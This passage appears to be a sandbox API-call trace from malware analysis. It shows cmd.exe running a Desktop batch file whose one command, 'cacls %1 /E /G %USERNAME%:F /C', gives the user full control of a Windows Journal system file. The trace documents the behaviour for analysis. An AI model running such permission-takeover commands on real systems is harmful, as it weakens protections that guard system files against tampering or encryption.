ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x603ee8 [0218.988] FindClose (in: hFindFile=0x603ee8 | out: hFindFile=0x603ee8) returned 1 [0218.989] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0218.989] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0218.989] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0218.989] GetProcessHeap () returned 0x5f0000 [0218.989] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606be0 | out: hHeap=0x5f0000) returned 1 [0218.989] GetEnvironmentStringsW () returned 0x6060f0* [0218.989] GetProcessHeap () returned 0x5f0000 [0218.989] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb36) returned 0x607f30 [0218.989] FreeEnvironmentStringsW (penv=0x6060f0) returned 1 [0218.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0218.989] GetProcessHeap () returned 0x5f0000 [0218.989] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6076d0 | out: hHeap=0x5f0000) returned 1 [0218.989] GetProcessHeap () returned 0x5f0000 [0218.990] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400e) returned 0x608a70 [0218.990] GetProcessHeap () returned 0x5f0000 [0218.990] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xea) returned 0x604dc0 [0218.990] GetProcessHeap () returned 0x5f0000 [0218.990] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x60ca88 [0218.991] GetProcessHeap () returned 0x5f0000 [0218.991] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x610a98 [0218.991] GetProcessHeap () returned 0x5f0000 [0218.991] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x608a70 | out: hHeap=0x5f0000) returned 1 [0218.991] GetConsoleOutputCP () returned 0x1b5 [0218.992] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0218.992] GetUserDefaultLCID () returned 0x409 [0218.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0218.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f748, cchData=128 | out: lpLCData="0") returned 2 [0218.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f748, cchData=128 | out: lpLCData="0") returned 2 [0218.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f748, cchData=128 | out: lpLCData="1") returned 2 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0218.993] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0218.993] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.994] GetProcessHeap () returned 0x5f0000 [0218.995] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20c) returned 0x604eb8 [0218.995] GetConsoleTitleW (in: lpConsoleTitle=0x604eb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.995] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0218.995] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0218.995] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0218.995] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0218.996] GetProcessHeap () returned 0x5f0000 [0218.996] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x608a70 [0218.996] GetProcessHeap () returned 0x5f0000 [0218.996] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x608a70 | out: hHeap=0x5f0000) returned 1 [0218.998] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0218.998] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0218.998] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0218.998] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0218.998] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0218.998] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0218.998] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0218.999] GetProcessHeap () returned 0x5f0000 [0218.999] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x6050d0 [0218.999] GetProcessHeap () returned 0x5f0000 [0218.999] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x72) returned 0x600ee0 [0219.000] GetProcessHeap () returned 0x5f0000 [0219.000] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x7a) returned 0x605130 [0219.001] GetConsoleTitleW (in: lpConsoleTitle=0x16f440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.002] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0219.002] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0219.002] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0219.002] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0219.002] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0219.002] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0219.002] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0219.002] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0219.002] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0219.002] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0219.002] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0219.002] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0219.002] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0219.002] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0219.002] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0219.002] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0219.002] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0219.002] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0219.002] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0219.003] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0219.003] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0219.003] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0219.003] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0219.003] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0219.003] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0219.003] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0219.003] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0219.003] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0219.003] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0219.003] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0219.003] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0219.003] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0219.003] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0219.003] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0219.003] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0219.003] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0219.003] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0219.003] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0219.003] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0219.003] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0219.003] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0219.003] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0219.003] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0219.003] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0219.004] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0219.004] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0219.004] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0219.004] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0219.004] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0219.004] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0219.004] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0219.004] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0219.004] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0219.004] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0219.004] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0219.004] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0219.004] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0219.004] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0219.004] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0219.004] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0219.004] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0219.004] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0219.004] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0219.004] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0219.004] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0219.004] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0219.004] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0219.005] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0219.005] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0219.005] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0219.005] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0219.005] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0219.005] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0219.005] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0219.005] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0219.005] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0219.005] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0219.005] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0219.005] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0219.005] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0219.005] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0219.005] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0219.005] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0219.005] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0219.005] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0219.005] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0219.005] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0219.005] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0219.005] GetProcessHeap () returned 0x5f0000 [0219.005] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x6051b8 [0219.005] GetProcessHeap () returned 0x5f0000 [0219.005] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe4) returned 0x6053d0 [0219.008] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0219.008] GetProcessHeap () returned 0x5f0000 [0219.008] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x5f07f0 [0219.008] SetErrorMode (uMode=0x0) returned 0x0 [0219.008] SetErrorMode (uMode=0x1) returned 0x0 [0219.008] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5f07f8, lpFilePart=0x16ef60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16ef60*="Desktop") returned 0x25 [0219.008] SetErrorMode (uMode=0x0) returned 0x1 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f07f0, Size=0x6e) returned 0x5f07f0 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f07f0) returned 0x6e [0219.009] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x5a) returned 0x6054c0 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa8) returned 0x605528 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x605528, Size=0x5a) returned 0x605528 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x605528) returned 0x5a [0219.009] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.009] GetProcessHeap () returned 0x5f0000 [0219.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe0) returned 0x5f0868 [0219.015] GetProcessHeap () returned 0x5f0000 [0219.015] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f0868, Size=0x76) returned 0x5f0868 [0219.015] GetProcessHeap () returned 0x5f0000 [0219.015] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f0868) returned 0x76 [0219.016] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.016] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x16ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ecfc) returned 0x605590 [0219.016] GetProcessHeap () returned 0x5f0000 [0219.016] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6055d0 [0219.016] FindClose (in: hFindFile=0x605590 | out: hFindFile=0x605590) returned 1 [0219.016] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0219.016] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0219.016] GetConsoleTitleW (in: lpConsoleTitle=0x16f1d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.303] GetProcessHeap () returned 0x5f0000 [0219.303] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x11c) returned 0x5f08e8 [0219.303] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0219.303] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0219.303] IdentifyCodeAuthzLevelW () returned 0x1 [0219.311] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0219.311] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0219.312] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0219.312] CloseCodeAuthzLevel () returned 0x1 [0219.312] SetErrorMode (uMode=0x0) returned 0x0 [0219.312] SetErrorMode (uMode=0x1) returned 0x0 [0219.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x6051c0, lpFilePart=0x16f0c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x16f0c0*="Ch81ANBE.bat") returned 0x32 [0219.312] SetErrorMode (uMode=0x0) returned 0x1 [0219.312] GetProcessHeap () returned 0x5f0000 [0219.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x72) returned 0x600f60 [0219.312] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", _Control=" \x09") returned 0x1 [0219.312] GetProcessHeap () returned 0x5f0000 [0219.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x78) returned 0x600fe0 [0219.312] GetProcessHeap () returned 0x5f0000 [0219.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe8) returned 0x5f11b8 [0219.312] GetProcessHeap () returned 0x5f0000 [0219.312] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f11b8, Size=0x7a) returned 0x5f11b8 [0219.312] GetProcessHeap () returned 0x5f0000 [0219.312] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f11b8) returned 0x7a [0219.312] CmdBatNotification () returned 0x605222 [0219.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0219.313] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0219.313] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.314] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.314] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.314] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.314] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0xe2, lpOverlapped=0x0) returned 1 [0219.316] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0219.316] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0219.317] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.317] GetFileType (hFile=0x78) returned 0x1 [0219.317] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.317] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0219.317] GetProcessHeap () returned 0x5f0000 [0219.318] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x608a70 [0219.318] GetProcessHeap () returned 0x5f0000 [0219.318] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x614aa8 [0219.322] GetProcessHeap () returned 0x5f0000 [0219.322] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x6077c0 [0219.322] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0219.322] GetProcessHeap () returned 0x5f0000 [0219.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6077c0 | out: hHeap=0x5f0000) returned 1 [0219.323] GetProcessHeap () returned 0x5f0000 [0219.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0219.323] GetProcessHeap () returned 0x5f0000 [0219.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x608a70 | out: hHeap=0x5f0000) returned 1 [0219.324] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0219.324] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0219.324] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0219.324] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0219.324] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0219.324] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0219.324] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0219.324] GetProcessHeap () returned 0x5f0000 [0219.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x5f1240 [0219.324] GetProcessHeap () returned 0x5f0000 [0219.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x5f12a0 [0219.327] GetProcessHeap () returned 0x5f0000 [0219.327] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xba) returned 0x6060f0 [0219.329] _tell (_FileHandle=3) returned 32 [0219.329] _close (_FileHandle=3) returned 0 [0219.329] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16eebc | out: _Buffer="\r\n") returned 2 [0219.330] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.330] GetFileType (hFile=0x7) returned 0x2 [0219.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.330] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee7c | out: lpMode=0x16ee7c) returned 1 [0219.331] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.331] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eea8*=0x2) returned 1 [0219.331] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.332] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16eeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0219.332] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16eeb8 | out: _Buffer=">") returned 1 [0219.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.332] GetFileType (hFile=0x7) returned 0x2 [0219.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee80 | out: lpMode=0x16ee80) returned 1 [0219.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.333] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16eeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16eeac*=0x26) returned 1 [0219.334] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.335] GetFileType (hFile=0x7) returned 0x2 [0219.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.335] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f104 | out: lpMode=0x16f104) returned 1 [0219.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.336] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5f12a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16f130, lpReserved=0x0 | out: lpBuffer=0x5f12a8*, lpNumberOfCharsWritten=0x16f130*=0x5) returned 1 [0219.336] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f13c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 89 [0219.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.336] GetFileType (hFile=0x7) returned 0x2 [0219.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.337] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0219.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x59, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x59) returned 1 [0219.338] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f15c | out: _Buffer="\r\n") returned 2 [0219.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.338] GetFileType (hFile=0x7) returned 0x2 [0219.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.339] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f11c | out: lpMode=0x16f11c) returned 1 [0219.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.339] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f148*=0x2) returned 1 [0219.339] 